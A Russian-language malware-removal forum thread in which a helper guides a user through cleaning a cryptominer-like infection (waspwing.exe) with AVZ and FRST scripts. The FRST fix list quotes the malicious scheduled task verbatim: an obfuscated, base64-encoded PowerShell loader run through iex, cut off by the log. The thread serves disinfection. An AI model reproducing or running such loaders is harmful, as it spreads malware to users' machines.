waspwing.exe нагружает ЦП до 100%

[Zunate]

Здравствуйте! В последнее время стал замечать, что периодически очень сильно тормозит комп. В диспетчере заметил несколько процессов waspwing.exe, которые практически сразу исчезали, но всегда возвращались в итоге. Можно ли с этим сделать что-то? Логи прикрепляю.

[Info_bot]

Уважаемый(ая) Zunate, спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

[Vvvyg]

Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:

Код:

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('C:\ProgramData\windows\dlchosts.exe', '');
 QuarantineFile('C:\ProgramData\windows\profile\dllhostn.exe', '');
 QuarantineFile('C:\ProgramData\windows\profile\service.exe', '');
 DeleteFile('C:\ProgramData\windows\dlchosts.exe', '');
 DeleteFile('C:\ProgramData\windows\profile\dllhostn.exe', '');
 DeleteFile('C:\ProgramData\windows\profile\service.exe', '');
 DeleteFileMask('c:\programdata\windows', '*', true);
 DeleteDirectory('c:\programdata\windows');
 DeleteSchedulerTask('Microsoft\Windows\LanguageComponentsInstaller\LanguageComponentsInstaller');
 DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT');
 DeleteSchedulerTask('Microsoft\Windows\MUI\681861464');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[Zunate]

Сделано

[Vvvyg]

Выделите и скопируйте в буфер обмена следующий код:

Код:

Start::
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
Task: {117E2D01-1275-4560-90E9-A34BB4EE69A3} - \Microsoft\Windows\DiskFootprint\StorageSense -> Нет файла <==== ВНИМАНИЕ
Task: {12514C9A-1DE5-40CE-B66C-D6838DA9A169} - \Microsoft\Windows\CloudExperienceHost\CreateObjectTask -> Нет файла <==== ВНИМАНИЕ
Task: {36A78C3E-A142-4F86-903E-AE26291F646C} - \Microsoft\Windows\Autochk\Proxy -> Нет файла <==== ВНИМАНИЕ
Task: {3A4032F6-6063-4D54-BAE3-F8A4A5110CDA} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver -> Нет файла <==== ВНИМАНИЕ
Task: {3D363385-64B8-4207-AC46-3EE180DD87F2} - \Microsoft\Windows\Application Experience\StartupAppTask -> Нет файла <==== ВНИМАНИЕ
Task: {53FE559C-30AB-4515-B492-C8B30F409C83} - \Microsoft\Windows\Application Experience\AitAgent -> Нет файла <==== ВНИМАНИЕ
Task: {54D4D29C-744B-42E7-AD2C-11F44FB5A509} - \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask -> Нет файла <==== ВНИМАНИЕ
Task: {69D15B8E-729C-4C1C-A0E7-6DCA5E963E60} - \Microsoft\Windows\DUSM\dusmtask -> Нет файла <==== ВНИМАНИЕ
Task: {701473A3-4C61-4063-AAC6-871E22A29FE7} - \Microsoft\Windows\Maps\MapsToastTask -> Нет файла <==== ВНИМАНИЕ
Task: {73469C3A-0B60-4A11-AD8A-FC67A901B741} - \Microsoft\Windows\Application Experience\ProgramDataUpdater -> Нет файла <==== ВНИМАНИЕ
Task: {7572B7F9-BE9D-43BF-9A4E-F82023EDBD33} - \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip -> Нет файла <==== ВНИМАНИЕ
Task: {7617E03F-109E-435B-9B4C-0282CD5BE4A9} - \Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload -> Нет файла <==== ВНИМАНИЕ
Task: {7A5AFDB2-56EC-4352-AB44-069E7BF253A8} - \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser -> Нет файла <==== ВНИМАНИЕ
Task: {92FFE795-C628-4324-AB97-06F804352DB6} - \Microsoft\Windows\Feedback\Siuf\DmClient -> Нет файла <==== ВНИМАНИЕ
Task: {C9EC268B-1D36-4AF0-A1EB-2C1BC3B455D9} - \Microsoft\Windows\DiskFootprint\Diagnostics -> Нет файла <==== ВНИМАНИЕ
Task: {E577C99D-E5DD-43E8-9E9F-2D291B431572} - \Microsoft\Windows\Maps\MapsUpdateTask -> Нет файла <==== ВНИМАНИЕ
Task: {ED04DE68-EAB7-4F40-A0E9-416E8CADBDAF} - System32\Tasks\Microsoft\Windows\TPM\TPM => powershell.exe -c "$icmyN='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';$fZba='yvVeiCAxUPhiv';$cKQC=($fZba[4]+$fZba[3]+$fZba[7]);&$cKQC(&$cKQC ('''[TeoIrtxt.EncooIrtding]::UToIrtF''+2*2*2+''.GeoIrttStoIrtring([ConoIrtvert]::Fro''+''moIrtB''+''ase''+8*8+''StrioIrtng(([reoIrtgex]:oIrt:MaoIrttchoIrtes(''''==QKp8GT4FEJocmb0JXSvlmc0JXSvR3U0VGdyl0bH5COGRncJ9GVVpjOddmbpRncJ9GZvNGdyl0buVkL0hHdyl0blRlLtVGd0JXSvNXe0JXSvN1WogHdyl0blRncJ9Wa7kiclJGdyl0btVnbsRncJ9WYpJXZT5iZI5mQZJ2bksyJgcyKsVGZ0JXSv9WTuYGSuJUWi9GJoASKp4UetNWakgyZulmc0RncJ92U0QncJ9mNlNXY0JXSvJUbvRncJ9mcGpjOdRnclZHdyl0bu92Qu0WZ0RncJ92c5N1WoAyY0JXSvVGZ98GT4FEJ7IXZi1Gdyl0b15GbhlGdyl0byV2UswWZ0JXSvR2bNBCdjVGdyl0bsV2c813JwUkVJJFRMFEdyl0bDl0UZhEUc5CXcdCIxVWLgQUSlRncJ92YpZXZE5yXksHIlJHdyl0blh2d8VmdpRncJ9mcktGdyl0bzlGZfJzM0JXSv5Wa0JXSvdHIp1Gdyl0b3dWPmhkbCllYvRSf7EUQrlFJg4mc0JXSvVHdlJXfrsiZI5mQZRyOUt2VxRCIy9Gei1CIdZGSuJUWksFWipGZkAicvRncJ9Gei1CIdtUeapmZyRyWBF0aZRSPdtUeapmZyRyWBF0aZRyOUt2VxRCIy9Gdyl0b4JWLgkiM1EDIy9mYtACVrdVckACZuRncJ9WYi1CIzIDK9Q1aXFHJ9BTPmhkbClFJ7lCduV3bD5CWipGZkASZn1CImhkbClFJoYWa7lyKrsUeapmZyRyO05WdvNkLBF0aZRCI0xWLgsUeapmZyRyOw0zS5plamJHJoI3b0JXSvZ2Ow0jZI5mQZRyOdBzWYJmakRSPUt2VxRyOpkXQntWaVRCKzVGdyl0b0lnQ0RncJ9WZH5COGRVV6oTXn5Gdyl0bpR2bj5WRuQHdyl0b4VGVu0WZ0JXSvR3c5N1W9glYqRGJ7lSeBd2apVFJddmbpJHdyl0b0N3WsEUQrlFJd11WlRHdyl0b5J2WoMWZ0JXSvRGIu9Wa0NGdyl0buVnZ'''',''''.'''',''''RioIrtghoIrttToIrtoLoIrteft'''')|FooIrtrEaoIrtch {$oIrt_oIrt.valoIrtue}) -joIrto''+''in ''''''''))-repoIrtlace''''ooIrtIrt''''|&(''''ioIrteoIrtx'''');''-'+'rep'+'lace''oIrt'''))" -c "$icmyN='u322Uu0kqgymIuMA5QPWTM9ZtDrARJgs0nSfOeJEy1bOBNozhRf4YpFLtQaNS8hx6SDte+Mb1EK5VKFSvUXWUrIu1VLdI7440zDYG4Nb2QSKWtNL62iTApcG1xfqO/4A+3XvB9IQ5xKwCbRZkUK5fo4Oi2X1foY0y13RUt8Rl0jYEaAjmFjfDYwJ8z2vAqJPyBuPFOoPoS7sCdY353qpBZlk+WKcSZcc4kHIEY4F1ED5LsdBiU24CfN7/DHqYPQwmQTmEOoD/UDcBuN0iAXTNe4/vWfIVOBU (запись имеет ещё 3507 символов). (Нет файла)
Task: {ED77AEE0-EAFB-4133-B544-9E7C5632D902} - \Microsoft\Windows\Customer Experience Improvement Program\Consolidator -> Нет файла <==== ВНИМАНИЕ
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
2021-11-24 00:56 - 2021-11-24 00:56 - 1063345664 _____ C:\Windows\MEMORY.DMP
2021-11-24 00:56 - 2021-11-24 00:56 - 000798308 _____ C:\Windows\Minidump\112421-8187-01.dmp
2021-11-08 20:30 - 2021-11-08 20:30 - 000000022 _____ C:\quarantine.zip
021-11-30 22:44 - 2021-05-09 08:25 - 000000000 _RSHD C:\ProgramData\Windows
ContextMenuHandlers1: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> Нет файла
ContextMenuHandlers4: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> Нет файла
IE trusted site: HKU\S-1-5-21-3474453275-868908962-3883695755-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3474453275-868908962-3883695755-1000\...\webcompanion.com -> hxxp://webcompanion.com
FirewallRules: [{46F45B35-1A1C-4F01-BCB5-89FF4310E840}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe => Нет файла
FirewallRules: [{044220AA-C143-4A51-B3BC-3F94DDE47665}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
FirewallRules: [{6CD8E97C-DAE7-4824-B70E-F7692E25DE24}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
Reboot:
End::

Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сообщите, что с проблемой.

[Zunate]

Сделано
Пока что не наблюдал процесса в диспетчере, но судить сложно. Возможно, что решение помогло.

[Vvvyg]

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

[Zunate]

Готово

[Vvvyg]

Контроль учётных записей пользователя отключен

Рекомендую ознакомиться со статьёй Так ли страшен контроль учетных записей (UAC)? и включить.

Обновите софт:

7-Zip 21.01 alpha (x64) v.21.01 alpha Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
Java 8 Update 291 v.8.0.2910.10 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u311-windows-i586.exe)^
Adobe Acrobat DC v.21.001.20145 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - Проверить обновления!^